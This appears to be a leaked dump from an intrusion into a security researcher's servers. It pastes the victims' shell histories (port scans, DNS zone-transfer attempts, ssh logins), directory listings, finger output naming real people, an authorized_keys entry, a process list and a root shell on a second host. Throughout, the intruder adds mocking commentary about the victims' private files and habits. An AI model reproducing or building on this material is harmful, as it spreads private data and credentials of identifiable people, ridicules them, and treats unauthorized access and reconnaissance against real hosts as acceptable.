tcpdump -n dst host 66.92.163.118 exit #nmap -P0 -sS -r --max_rtt_timeout 66.92.163.118 ping 66.92.163.118 ping 66.92.163.118 nmap -P0 -sS -r --max_rtt_timeout 110 --min_rtt_timeout 27 --initial_rtt_timeout 55 66.92.163.118 nmap -P0 -p1-65535 -r --max_rtt_timeout 110 --min_rtt_timeout 27 --initial_rtt_timeout 55 66.92.163.118 exit ls nmap -v nmap -V nmap -sS -oA -sV -P0 -p1-65535 -oA nmap-transfer.activision.com transfer.activision.com ls ls ls ls pwd ls cd .. ls cd /usr/local/ ls ls bin/ apt-get install scanrand cd /usr/ports/ ls find . -name "*scanrand*" -print find . -name "*paketto*" -print ls cd ls su - jay cp paketto-1.10.tar.gz ~jay/ su - jay vi /etc/passwd ls chown jay ~jay/paketto-1.10.tar.gz su - jay cd ~jay/paketto-1.10 make install dmesg | less pwd ls cd ls tail -f nmap-transfer.activision.com.gnmap tail -f nmap-transfer.activision.com.xml tail -f nmap-transfer.activision.com.xml ' ' ' mv nmap-3.75.tar.bz2 ~jay/ ; chown jay ~jay/nmap* su - nmap su - jay pwd cd ~jay cd nmap-3.75 ls make install ls su - jay nessusd ls nessusd ls cd ls nessusd traceroute transfer.activison.com iptables -A OUTPUT -j ACCEPT ls ping webtracker4.activision.com nmap -P0 -p1-65535 -sS -oA nmap-scan-webtracker4.txt webtracker4.activision.com nmap -P0 -sS -p 22,21,23 66.77.144.28 traceroute 66.77.144.28 nmap -P0 -sS -p 22,21,23 66.77.144.28 traceroute 66.77.144.28 tcptraceroute pwd cd /usr/ports/ find . -name "tcptrace*" -print cd net/tcptraceroute/ ls make install pwd cd tcptraceroute 66.77.144.28 tcptraceroute -p 1521 66.77.144.28 tcptraceroute -p 23 66.77.144.28 ls exit ls tail nmap-scan-webtracker4.txt. tail nmap-scan-webtracker4.txt.nmap tail nmap-scan-webtracker4.txt.xml cat nmap-scan-webtracker4.txt.xml tcpdump src host 66.77.144.43 nmap -P0 -sS -p80 webtracker4.activision.com nmap -P0 -sS -p443 webtracker4.activision.com nmap -P0 -sS -p1-65535 -oA 63.146.124.34-35-37 63.146.124.34 63.146.124.35 63.146.124.37 su - jay ls ls less 63.146.124.34-35-37.nmap bitchx Bitchx BitchX cd /usr/ports ls find . -name "irc*" -print cd irc ls sirc cd sirc make install screen su - jay screen -r screen -r screen -r screen -wipe screen -r ps -ef |grep screen screen -r screen -r screen -r man screen screen -d screen -r exit screen -r exit exit screen -a screen -r exit screen -r ls ps -ef | grep air grep air /etc/inetd.conf pwd cd make tar -xzvf airhook-2.tar.gz cd airhook-2 ls make echo $? ls less README vi Makefile make screen -r screen -r su - jay screen -d screen -r screen -r screeen -d screen -d screen -r su - jay su - jay su - jay exit screen -r screen useradd lance adduser lance su - lance userdel lance deluser lance vi /etc/passwd vi /etc/shadow vi /etc/shadow vi /etc/passwd su - lance su - jay ls exit screen screen -r screen -d screen -r rmuser lance exit dsirc sirc www2.linuxsecurity.org su - jay exit screen -r ps -ef |grep screen screen screen -r screen -d && screen -r screen -r screen -d screen -r screen -r pkg_info | grep nmap nmap clear i su - jay ls cat /etc/passwd su - jay ls ls -l /etc/passwd cat /etc/passwd ls ~effugas ls pwd ls -l cd .. ls ls -l last -1 nmap -P0 -O 216.220.209.238 exit last -1 last -1 effugas nmap -O 216.220.209.238 nmap -O -P0 216.220.209.238 screen screen -r screen -d screen -r exit last -1 jay last -1 jb last -1 -n jb last -1 -i jb man last last -1 jb nmap -O 24.19.11.162 | less nmap -P0 -O 24.19.11.162 | less nmap -P0 -O 24.19.11.162 | less nmap -P0 -p1-65535 -O 24.19.11.162 | less nmap -P0 -sS -p1-65535 -O 24.19.11.162 | less ls rm -fr 63.146.124.34-35-37.* ls rm -fr nmap-* ls cd ~jay ls pwd cat /etc/passwd passwd jay ls cd ~jay ls passwd jay ls ls rm -fr paketto-1.10 nmap-3.75 nmap-3.75.tar.bz2 paketto-1.10.tar.gz ls ls cd ~jay ls less goodluck\! rm goodluck\! mv vpnforjay.tar.gz ~jb/ cd passwd jay exit ls su - jay ls cat /etc/passwd su - effugas_nr cd ~effugas_nr/ ls ls BitTorrent-3.4.2 tar -cf - BitTorrent-3.4.2 | ( cd ~jay/ ; tar -xvf - ) cd ~jay lks ls chown -R jay BitTorrent-3.4.2/ ls -al chgrp jay BitTorrent-3.4.2/ chgrp -R jay BitTorrent-3.4.2/ su - jay cat /etc/passw cat /etc/passwd passwd jb passwd jay exit exit cat /etc/resolv.conf cat /etc/passwd su - jay su - jay su - jay ls su - jay exit ls cat /etc/passwd cd ~jay ls cd .ssh/ ls cat >known_hosts mv known_hosts authorized_hosts chown jay authorized_hosts ls ls -al chmod go-r authorized_hosts nmap nmap -sP 192.12.34.0/24 nmap -sS 192.12.34.0/24 nmap -P0 -sS 192.12.34.0/24 dig -x 192.12.34.1 dig -x 192.12.34.2 dig -x 192.12.34.3 dig -x 192.12.34.4 dig -x 192.12.34.5 dig -x 192.12.34.6 dig -x 192.12.34.7 dig -x 192.12.34.8 dig -x 192.12.34.9 ls screen -r exit exit clear dig @arizona.edu darthmouth.edu AXFR dig @ns1.dartmouth.edu darthmouth.edu AXFR dig @ns2.dartmouth.edu darthmouth.edu AXFR ifconfig clear last -i last jay last j last jb ssh root at 129.170.18.156 last jb ssh root at 129.170.18.156 ssh jay at 129.170.18.156 ssh jay at 129.170.18.156 exit cd ~jay ls cd .ssh/ ls cat authorized_keys* ~jb/.ssh/ cp authorized_keys* ~jb/.ssh/ man syslogd man syslogd exit exit ssh jay at 129.170.18.249 ssh jay at 129.170.18.156 #nmap -P0 -sS -p 1-65535 --max ping 70.250.13.88 ping 70.250.13.89 nmap -P0 -sS -p 1-65535 --initial_rtt_timeout=5 --min_rtt_timeout=5 --max_rtt_timeout=25 70.250.13.88 screen screen ssh jay at holly ssh jay at 129.170.18.156 exit ssh jay at 129.170.18.156 nmap -P0 -sS -p 1-65535 --initial_rtt_timeout=5 --min_rtt_timeout=5 --max_rtt_timeout=25 -oA test-scan-ddi-for-quoting 70.250.13.88 exit screen -r clear ssh jay at 129.170.18.156 ssh jay at 129.170.18.156 man pwcheck_pam ssh jay at 129.170.18.249 ssh jay at 129.170.18.156 ssh jay at 129.170.18.156 ssh jay at 129.170.18.249 su - jay exit cat /etc/hosts ssh jay at 129.170.18.249 exit ssh jay at 24.18.17.11 ssh -p 49356 jay at 24.18.17.11 ssh -p 49356 jay at 24.19.18.11 ssh -p 49356 jay at 24.19.18.11 last -i last last | less ssh -p 49356 jay at 24.19.18.11 nc 24.19.18.11 49356 exit %ls -la psm total 236 drwxr-x--- 7 psm pmjm 1536 Jul 13 15:34 . drwxr-xr-x 33 root wheel 1024 Jul 13 14:24 .. -rw------- 1 psm pmjm 173 Jul 10 2008 .Xauthority.gz -rw-r--r-- 1 psm pmjm 0 Jul 3 2004 .addressbook -rw------- 1 psm pmjm 2285 Jul 11 2004 .addressbook.lu -rw-r--r-- 1 psm pmjm 24 Jul 3 2004 .bash_logout -rw-r--r-- 1 psm pmjm 191 Jul 3 2004 .bash_profile -rw-r--r-- 1 psm pmjm 124 Jul 3 2004 .bashrc -rw-r--r-- 1 psm pmjm 771 May 30 2004 .cshrc -rw------- 1 psm pmjm 169 Jun 20 15:03 .lesshst -rw-r--r-- 1 psm pmjm 760 Jul 3 2004 .login -rw-r--r-- 1 psm pmjm 165 May 30 2004 .login_conf -rw------- 1 psm pmjm 371 May 30 2004 .mail_aliases -rw-r--r-- 1 psm pmjm 331 May 30 2004 .mailrc -rw-r--r-- 1 psm pmjm 11 Jul 3 2004 .mh_profile -rw-r--r-- 1 psm pmjm 2 Mar 24 2006 .msgsrc drwxr-xr-x 2 psm pmjm 512 May 9 21:38 .ncftp drwx------ 8 psm pmjm 512 May 9 21:38 .openwebmail -rw------- 1 psm pmjm 10632 Jul 3 2004 .pine-debug1 -rw------- 1 psm pmjm 10768 Jul 3 2004 .pine-debug2 -rw------- 1 psm pmjm 11164 Jul 3 2004 .pine-debug3 -rw------- 1 psm pmjm 10790 Jul 3 2004 .pine-debug4 -rw------- 1 psm pmjm 17153 Oct 2 2008 .pinerc -rw-r--r-- 1 psm pmjm 277 Jul 24 2006 .procmailrc -rw-r--r-- 1 psm pmjm 801 May 30 2004 .profile -rw-r--r-- 1 psm pmjm 852 May 30 2004 .shrc drwx------ 2 psm support 512 Jul 1 16:48 .spamassassin drwx------ 2 psm pmjm 512 May 9 22:32 .ssh drwxr-xr-x 2 psm pmjm 512 May 9 21:39 .ssh2 -rw-r--r-- 1 psm pmjm 1457 Jan 24 2007 .tcshrc -rw------- 1 psm psm 198 Nov 13 2006 .vacation.msg %finger psm Login: psm Name: Paul S. Mauvais Directory: /home/psm Shell: /bin/tcsh Last login Mon Jul 13 13:35 (PDT) on ttyp4 from 128-107-239-233 No Mail. No Plan. %ls -la hampshir/ total 159852 drwxr-xr-x 7 hampshir hampshir 512 Sep 14 2007 . drwxr-xr-x 33 root wheel 1024 Jul 13 14:24 .. -rw-r--r-- 1 hampshir hampshir 24 Apr 2 2004 .bash_logout -rw-r--r-- 1 hampshir hampshir 191 Apr 2 2004 .bash_profile -rw-r--r-- 1 hampshir hampshir 124 Apr 2 2004 .bashrc -rw-r--r-- 1 hampshir hampshir 5531 Apr 2 2004 .canna -rw-r--r-- 1 hampshir hampshir 771 May 18 2005 .cshrc -rw-r--r-- 1 hampshir hampshir 847 Apr 2 2004 .emacs -rw-r--r-- 1 hampshir hampshir 120 Apr 2 2004 .gtkrc drwxr-xr-x 3 hampshir hampshir 512 Apr 2 2004 .kde -rw-r--r-- 1 hampshir hampshir 255 May 18 2005 .login -rw-r--r-- 1 hampshir hampshir 165 May 18 2005 .login_conf -rw------- 1 hampshir hampshir 371 May 18 2005 .mail_aliases -rw-r--r-- 1 hampshir hampshir 58 Apr 10 2004 .mailboxlist -rw-r--r-- 1 hampshir hampshir 331 May 18 2005 .mailrc drwx------ 7 hampshir mail 512 Apr 3 2004 .openwebmail -rw-r--r-- 1 root wheel 690 May 19 2005 .procmailrc -rw-r--r-- 1 hampshir hampshir 801 May 18 2005 .profile -rw------- 1 hampshir hampshir 276 May 18 2005 .rhosts -rw-r--r-- 1 hampshir hampshir 852 May 18 2005 .shrc drwx------ 2 hampshir hampshir 512 Oct 3 2006 .spamassassin -rw------- 1 hampshir hampshir 203 Apr 3 2004 .vacation.msg drwxr-xr-x 2 hampshir hampshir 512 Apr 2 2004 .xemacs -rw-r--r-- 1 hampshir hampshir 220 Apr 2 2004 .zshrc -rw------- 1 hampshir hampshir 81714487 Aug 2 2008 dead.letter drwxr-xr-x 2 hampshir wheel 512 May 9 14:35 mail %finger crystal Login: crystal Name: Crystal Williams (GF of DanK) Directory: /home/crystal Shell: /bin/sh On since Mon Jul 20 06:47 (PDT) on ttyp0, idle 1:53, from 76.14.85.220 No Mail. No Plan. %ls -la /home/crystal total 44 drwxr-xr-x 3 crystal crystal 512 Mar 21 09:33 . drwxr-xr-x 33 root wheel 1024 Jul 13 14:24 .. -rw-r--r-- 1 crystal crystal 751 Mar 21 09:32 .cshrc -rw-r--r-- 1 crystal crystal 248 Mar 21 09:32 .login -rw-r--r-- 1 crystal crystal 158 Mar 21 09:32 .login_conf -rw------- 1 crystal crystal 373 Mar 21 09:32 .mail_aliases -rw-r--r-- 1 crystal crystal 331 Mar 21 09:32 .mailrc -rw-r--r-- 1 crystal crystal 766 Mar 21 09:32 .profile -rw------- 1 crystal crystal 276 Mar 21 09:32 .rhosts -rw-r--r-- 1 crystal crystal 975 Mar 21 09:32 .shrc drwx------ 2 crystal crystal 512 Mar 21 09:33 .ssh %cat crystal/.ssh/authorized_keys ssh-dss AAAAB3NzaC1kc3MAAACBAKoahWlwtTNpzxIAEGtNvZh7ywdj/rz+hLYCeHov3BB/SHUs/L2puedXklA 5gOBI3uUTuuzwuInb1TI5PxXbuN7xiWic8igMECPrRYZfpF7Gnq9ne2qiyVrFlqYRtWZiXEmm72exCa UApup/BMcIP1XA8Vx1Oi+F8NtSP/Z4lvCtAAAAFQDEkLqAVAzvn/F3fzkfRZZbzfbIywAAAIEAkmTgH 3UAZs8o/JDTd8Y12BQD1AT4uWo035kiRPMm/G7nqwZRR/w3ivUcby/821kBSPEZ2Ef3ZP1mulv4cZYG Pm05KQj36oGMnZLTUWiM6JV2gymonfc533jfcc0j4THDLfohZpXNaEwdaXe/XkmVypX8KP0fh+rjzSg mCpMFcksAAACAFseVWv44o2y4aOem2bX3U3pvx2DOZaFHTjVr/LVW8HE459FlXxtHFAE49VcztwEVKU AsjnlpcpUZCpA/pNfv3Jf8HXGeDk8iujRZ6fzVAKHHm50H8EfX9kPF8ydyGkOA3l+mCCnzbKu9zdmSO 9kn3w1GsKciG4lFE7tnf785YGw= macuser at localhost %ls -la / total 4009 drwxr-xr-x 22 root wheel 1024 May 5 20:47 . drwxr-xr-x 22 root wheel 1024 May 5 20:47 .. -rw-r--r-- 2 root wheel 786 Jul 22 2008 .cshrc -rw-r--r-- 2 root wheel 253 Jul 22 2008 .profile drwxrwxr-x 2 root operator 512 Sep 19 2006 .snap -r--r--r-- 1 root wheel 6188 Jul 22 2008 COPYRIGHT drwxr-xr-x 2 root wheel 1024 Jul 23 2008 bin drwxr-xr-x 8 root wheel 1024 Jul 28 2008 boot drwxr-xr-x 2 root wheel 512 Sep 19 2006 cdrom lrwxr-xr-x 1 root wheel 10 Sep 19 2006 compat -> usr/compat dr-xr-xr-x 4 root wheel 512 May 5 13:49 dev drwxr-xr-x 2 root wheel 512 Sep 19 2006 dist -rw------- 1 root wheel 4096 May 5 20:47 entropy drwxr-xr-x 20 root wheel 2560 Jul 13 14:24 etc lrwxr-xr-x 1 root wheel 16 Sep 26 2006 export -> /usr/pmjm/export -rw-r--r-- 1 root wheel 2648 Sep 20 2006 findit.pl lrwxrwxrwx 1 root wheel 8 Sep 19 2006 home -> usr/home drwxr-xr-x 9 root wheel 512 Jul 17 2008 include -rw------- 1 root wheel 11834 Jul 28 2008 ktrace.out drwxr-xr-x 3 root wheel 2048 Jul 22 2008 lib drwxr-xr-x 2 root wheel 512 Jul 22 2008 libexec drwxr-xr-x 2 root wheel 512 Jun 5 2007 media drwxr-xr-x 2 root wheel 512 Nov 3 2005 mnt dr-xr-xr-x 2 root wheel 512 Nov 3 2005 proc -rw-r--r-- 1 root wheel 3059 May 5 20:50 razor-agent.log drwxr-xr-x 2 root wheel 2560 Jul 22 2008 rescue -rw------- 1 root wheel 1949696 Jul 22 2008 rndc.core drwxr-xr-x 7 root wheel 1024 May 10 07:08 root drwxr-xr-x 2 root wheel 3072 Jul 22 2008 sbin drwxr-xr-x 3 root wheel 512 Jul 17 2008 share lrwxr-xr-x 1 root wheel 11 Jul 22 2008 sys -> usr/src/sys drwxrwxrwt 17 root wheel 1536 Jul 20 08:40 tmp drwxr-xr-x 24 root wheel 512 Jul 23 2008 usr drwxr-xr-x 23 root wheel 512 May 5 13:49 var % ps ax PID TT STAT TIME COMMAND 0 ?? WLs 0:00.00 [swapper] 1 ?? SLs 1:27.55 /sbin/init -- 2 ?? DL 3:09.12 [g_event] 3 ?? DL 15:25.33 [g_up] 4 ?? DL 16:49.89 [g_down] 5 ?? DL 0:00.00 [thread taskq] 6 ?? DL 0:00.00 [acpi_task_0] 7 ?? DL 0:00.00 [acpi_task_1] 8 ?? DL 0:00.00 [acpi_task_2] 9 ?? DL 0:00.00 [xpt_thrd] 10 ?? DL 0:00.00 [audit] 11 ?? RL 107041:54.37 [idle: cpu0] 12 ?? WL 3:03.61 [swi1: net] 13 ?? WL 60:10.18 [swi4: clock sio] 14 ?? WL 0:00.00 [swi3: vm] 15 ?? DL 5:18.85 [yarrow] 16 ?? WL 0:00.00 [swi6: Giant taskq] 17 ?? WL 0:00.00 [swi6: task queue] 18 ?? WL 0:00.00 [swi2: cambio] 19 ?? DL 0:00.00 [kqueue taskq] 20 ?? WL 0:00.00 [swi5: +] 21 ?? WL 0:00.00 [irq9: acpi0] 22 ?? WL 0:00.00 [irq23: atapci0] 23 ?? WL 15:29.30 [irq22: atapci1] 24 ?? WL 0:00.00 [irq19: ohci0 ohci+] 25 ?? DL 0:00.36 [usb0] 26 ?? DL 0:00.00 [usbtask-hc] 27 ?? DL 0:00.00 [usbtask-dr] 28 ?? DL 0:00.23 [usb1] 29 ?? DL 0:00.39 [usb2] 30 ?? WL 0:00.00 [irq14: ata0] 31 ?? WL 0:00.00 [irq15: ata1] 32 ?? WL 83:33.79 [irq21: rl0] 33 ?? DL 9:31.22 [acpi_thermal] 34 ?? DL 0:03.56 [acpi_cooling0] 35 ?? WL 0:00.00 [swi0: sio] 36 ?? WL 0:00.00 [irq1: atkbd0] 37 ?? WL 0:00.00 [irq7: ppbus0 ppc0] 38 ?? DL 0:00.00 [sctp_iterator] 39 ?? DL 0:49.45 [pagedaemon] 40 ?? DL 0:00.00 [vmdaemon] 41 ?? DL 0:00.08 [pagezero] 42 ?? DL 0:28.93 [bufdaemon] 43 ?? DL 0:57.42 [vnlru] 44 ?? DL 157:57.51 [syncer] 45 ?? DL 3:21.70 [softdepflush] 137 ?? Is 0:00.00 adjkerntz -i 484 ?? Is 0:00.00 /sbin/devd 545 ?? Ss 7:37.79 /usr/sbin/syslogd -l /var/run/log -l /var/named/var/run/log -c 612 ?? Ss 3:46.39 /usr/local/sbin/named -u bind -c /etc/namedb/named.conf -t /var/named -u bind 757 ?? Ss 18:27.79 /usr/local/bin/spamd -c -d -r -d -r /var/run/spamd/spamd.pid (perl5.8.8) 796 ?? Ss 3:30.40 /usr/local/sbin/dovecot 800 ?? S 0:56.92 dovecot-auth 830 ?? Ss 4:14.31 /usr/local/sbin/httpd -D SSL 846 ?? Ss 5:24.13 /usr/sbin/sshd 862 ?? Ss 0:18.38 /usr/sbin/cron -s 1634 ?? I 0:00.58 /usr/local/sbin/httpd -D SSL 2329 ?? Is 0:00.04 sshd: crystal [priv] (sshd) 2331 ?? S 0:00.47 sshd: crystal at ttyp0 (sshd) 2897 ?? Ss 19:04.18 sendmail: accepting connections (sendmail) 2901 ?? Is 0:02.23 sendmail: Queue runner at 00:30:00 for /var/spool/clientmqueue (sendmail) 2976 ?? I 0:00.59 /usr/local/sbin/httpd -D SSL 2978 ?? I 0:00.75 /usr/local/sbin/httpd -D SSL 2979 ?? I 0:00.57 /usr/local/sbin/httpd -D SSL 4171 ?? I 0:00.40 /usr/local/sbin/httpd -D SSL 4173 ?? I 0:00.41 /usr/local/sbin/httpd -D SSL 4174 ?? I 0:00.37 /usr/local/sbin/httpd -D SSL 4175 ?? I 0:00.36 /usr/local/sbin/httpd -D SSL 4177 ?? I 0:00.43 /usr/local/sbin/httpd -D SSL 5880 ?? I 0:01.88 /usr/local/sbin/httpd -D SSL 5883 ?? I 0:01.81 /usr/local/sbin/httpd -D SSL 6790 ?? I 0:00.00 sendmail: server [122.50.138.199] cmd read (sendmail) 9957 ?? I 0:01.01 /usr/local/sbin/httpd -D SSL 9958 ?? I 0:01.05 /usr/local/sbin/httpd -D SSL 15274 ?? I 0:00.01 imap-login 17964 ?? Ss 0:00.19 sshd: root at ttyp4 (sshd) 19855 ?? Ss 0:00.02 sshd: [accepted] (sshd) 19856 ?? Ss 0:00.02 sshd: [accepted] (sshd) 19857 ?? S 0:00.01 sshd: [net] (sshd) 19858 ?? S 0:00.01 sshd: [net] (sshd) 36675 ?? Is 0:02.83 screen -D -R 39878 ?? I 1:02.49 spamd child (perl5.8.8) 41436 ?? I 0:00.20 /usr/local/sbin/httpd -D SSL 56971 ?? I 0:00.06 /usr/local/sbin/httpd -D SSL 57216 ?? I 0:00.17 /usr/local/sbin/httpd -D SSL 66304 ?? I 0:01.24 /usr/local/sbin/httpd -D SSL 68863 ?? I 0:00.31 /usr/local/sbin/httpd -D SSL 82722 ?? I 0:00.01 imap-login 83501 ?? I 0:00.19 /usr/local/sbin/httpd -D SSL 83937 ?? I 0:00.01 imap-login 87429 ?? I 0:00.47 /usr/local/sbin/httpd -D SSL 89035 ?? I 0:00.00 /bin/sh -c /usr/local/sbin/rotatelogs /var/log/httpd-error.log 604800 89036 ?? I 0:00.42 /usr/local/sbin/rotatelogs /var/log/httpd-error.log 604800 89037 ?? I 0:00.00 /bin/sh -c /usr/local/sbin/rotatelogs /var/log/httpd-access.log 86400 89038 ?? I 0:02.12 /usr/local/sbin/rotatelogs /var/log/httpd-access.log 86400 99329 ?? I 0:04.04 spamd child (perl5.8.8) 906 v0 Is+ 0:00.00 /usr/libexec/getty Pc ttyv0 907 v1 Is+ 0:00.00 /usr/libexec/getty Pc ttyv1 908 v2 Is+ 0:00.00 /usr/libexec/getty Pc ttyv2 909 v3 Is+ 0:00.00 /usr/libexec/getty Pc ttyv3 910 v4 Is+ 0:00.00 /usr/libexec/getty Pc ttyv4 911 v5 Is+ 0:00.00 /usr/libexec/getty Pc ttyv5 912 v6 Is+ 0:00.00 /usr/libexec/getty Pc ttyv6 913 v7 Is+ 0:00.00 /usr/libexec/getty Pc ttyv7 770 con- I 0:00.01 /bin/sh /usr/local/bin/mysqld_safe --defaults-extra-file=/usr/pmjm/db/my.cnf --user=mysql --datadir=/usr/pmjm/db --pid-file=/usr/pmjm/db/doxpara.com.pid 804 con- I 45:18.02 /usr/local/libexec/mysqld --defaults-extra-file=/usr/pmjm/db/my.cnf --basedir=/usr/local --datadir=/usr/pmjm/db --pid-file=/usr/pmjm/db/doxpara.com.pid 2333 p0 Ss+ 0:00.04 sh -c while [ 1 ] ; do echo 1864; sleep 60; done 19791 p0 S+ 0:00.00 sleep 60 36678 p1 Is+ 0:00.11 /usr/local/bin/bash 58554 p2 Is+ 0:00.04 /usr/local/bin/bash 37114 p3 Is 0:00.05 /usr/local/bin/bash 56230 p3 S+ 9:29.89 pine 17981 p4 Ss 0:00.07 -csh (csh) 19859 p4 R+ 0:00.00 ps ax // Some random exerpts from another session... // Jay Beale shows off elite nmap skillz in this .bash_history exit ls cd .ssh/ ls cp authorized_hosts authorized_hosts2 exit cd .ssh/ ls man authorized_hosts mv authorized_hosts authorized_keys mv authorized_hosts2 authorized_keys2 exit ls rm -fr BitTorrent-3.4.2/ ls ssh jay at 24.19.18.11 ssh -p 49356 jay at 24.19.18.11 exit scp -P 49356 "jay at 24.19.18.11:*.tbz2" scp -P 49356 "jay at 24.19.18.11:*.tbz2" . ls rm *tbz2 ls exit su - ls #j exit nmap nmap -h mannmap man nmap nmap -sL 192.52.229.0/24 nmap -sL 192.58.37.0/22 nmap -sL 192.58.37.0/22 >192.58.37.0-slash-22.txt ls ftp ftplocal.dartmouth.edu exit last -i last | less man last man last last jay w ssh jay at techsec ssh jay at 129.170.18.249 %head 192.58.37.0-slash-22.txt Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2006-08-16 11:13 PDT Host 192.58.36.0 not scanned Host 192.58.36.1 not scanned Host 192.58.36.2 not scanned Host 192.58.36.3 not scanned Host 192.58.36.4 not scanned Host 192.58.36.5 not scanned Host 192.58.36.6 not scanned Host 192.58.36.7 not scanned %tail 192.58.37.0-slash-22.txt ^M Host 192.58.39.247 not scanned Host 192.58.39.248 not scanned Host 192.58.39.249 not scanned Host 192.58.39.250 not scanned Host 192.58.39.251 not scanned Host 192.58.39.252 not scanned Host 192.58.39.253 not scanned Host 192.58.39.254 not scanned Host 192.58.39.255 not scanned Nmap run completed -- 1024 IP addresses (0 hosts up) scanned in 133.227 seconds Is Dan auditing pine? If only. %file pine.core pine.core: ELF 32-bit LSB core file Intel 80386, version 1 (FreeBSD), FreeBSD-style, from 'pin' %echo oh shit, pine 0day^M oh shit, pine 0day // If you were paying attention you might have caught Dan looking for dating help -rwx------ 1 effugas wheel 19253 May 20 2007 Alpha Man Conversation & Persuasion.torrent -rwx------ 1 effugas wheel 18865 Nov 4 2006 David X Seduction and Relationships Seminar.torrent -rwx------ 1 effugas wheel 20767 Oct 24 2006 Juggler - Charisma Arts Bootcamp.avi.torrent -rwx------ 1 effugas wheel 28554 Nov 18 2006 PickUp 101 - He Said, She Said - Volume 1.torrent // Dan is gonna be an ALPHA MAN // WATCH OUT LADIES !~~~~~~~~~ backend.doxpara.com ~~~~~~~~! root at 209.40.204.174's password: Last login: Wed Jun 24 10:22:29 2009 from 88.79.237.13 root at ovz-test:~# uname -a; id Linux ovz-test 2.6.18-53.1.13.el5xen #1 SMP Tue Feb 12 14:04:18 EST 2008 i686 GNU/Linux uid=0(root) gid=0(root) groups=0(root) root at ovz-test:/root# ls -la total 36892 drwxr-xr-x 12 root root 4096 Jun 24 10:23 . drwxr-xr-x 21 root root 4096 Dec 22 2008 .. -rw-r--r-- 1 root root 15180 Jun 24 11:38 .bash_history -rw-r--r-- 1 root root 2227 Oct 20 2007 .bashrc drwxr-xr-x 3 root root 4096 Jun 16 16:54 .cpan drwx------ 2 root root 4096 Jun 24 10:24 .irssi -rw------- 1 root root 57 Apr 13 07:48 .lesshst -rw------- 1 root root 466 Dec 27 2008 .mysql_history -rw-r--r-- 1 root root 141 Oct 20 2007 .profile drwx------ 2 root root 4096 Dec 27 2008 .ssh -rw-r--r-- 1 root root 62682 Jun 7 21:36 Net-Twitter-3.01000.tar.gz drwxr-xr-x 5 500 500 4096 Dec 28 1999 SMTP-Server-1.1 -rw-r--r-- 1 root root 13166 Dec 29 1999 SMTP-Server-1.1.tar.gz drwxrwxr-x 9 10132 root 4096 Dec 22 2008 bind-9.2.9 -rw-r--r-- 1 root root 5477026 Sep 25 2007 bind-9.2.9.tar.gz drwxrwxr-x 9 10132 root 4096 Dec 25 2008 bind-9.4.1-P1 -rw-r--r-- 1 root root 6341409 Dec 25 2008 bind-9.4.1-P1.tar.gz drwxrwxrwx 13 root root 4096 Apr 15 00:17 expat-2.0.1 -rw-r--r-- 1 root root 446456 Jun 7 2007 expat-2.0.1.tar.gz -rw-r--r-- 1 root root 1725 Feb 15 20:12 huh -rw-r--r-- 1 root root 3363 Dec 22 2008 index.html?pkg=bind9%2F9.2.9%2Fbind-9.2.9.tar.gz -rw-r--r-- 1 root root 4404 Dec 22 2008 index.html?pkg=bind9%2F9.2.9%2Fbind-9.2.9.tar.gz&name=BIND 9.2.9 Source&noframes=1 -rw-r--r-- 1 root root 2927234 Mar 6 00:58 log -rw-r--r-- 1 root root 469 Feb 15 20:47 log2 -rw-r--r-- 1 root root 580907 Feb 15 20:37 log3 -rw-r--r-- 1 root root 1601803 Feb 15 22:06 mslog drwxrwxrwx 13 notroot notroot 4096 Apr 13 08:11 netatalk-2.0.3 -rw-r--r-- 1 root root 1471804 May 18 2005 netatalk-2.0.3.tar.bz2 -rw-r--r-- 1 root root 5751 Apr 4 2007 proxyfuzz.py -rw-r--r-- 1 root root 1780510 Mar 6 05:15 tightvnc-1.3.10_unixsrc.tar.bz2 drwxr-xr-x 9 notroot notroot 4096 Apr 13 05:55 vnc_unixsrc drwx------ 11 root root 4096 Dec 26 2008 wireshark-1.0.5 -rw-r--r-- 1 root root 16861293 Dec 10 2008 wireshark-1.0.5.tar.gz root at ovz-test:/root# cat .bash_history dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com killall named named dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com killall named named dig @127.0.0.1 $RANDOM.ns1.toorrr.com killall named named dig @127.0.0.1 ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com killall named named dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com killall named named dig @127.0.0.1 ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 www.toorrr.com killall named dig @127.0.0.1 www.toorrr.com dig @127.0.0.1 www.toorrr.com dig @127.0.0.1 www.toorrr.com dig @deluvian.doxpara.com www.toorrr.com dig @deluvian.doxpara.com www.toorrr.com dig www.toorrr.com dig @127.0.0.1 www.toorrr.com dig @127.0.0.1 www.toorrr.com dig @127.0.0.1 www.toorrr.com any dig @127.0.0.1 ns1.toorrr.com killall named named dig 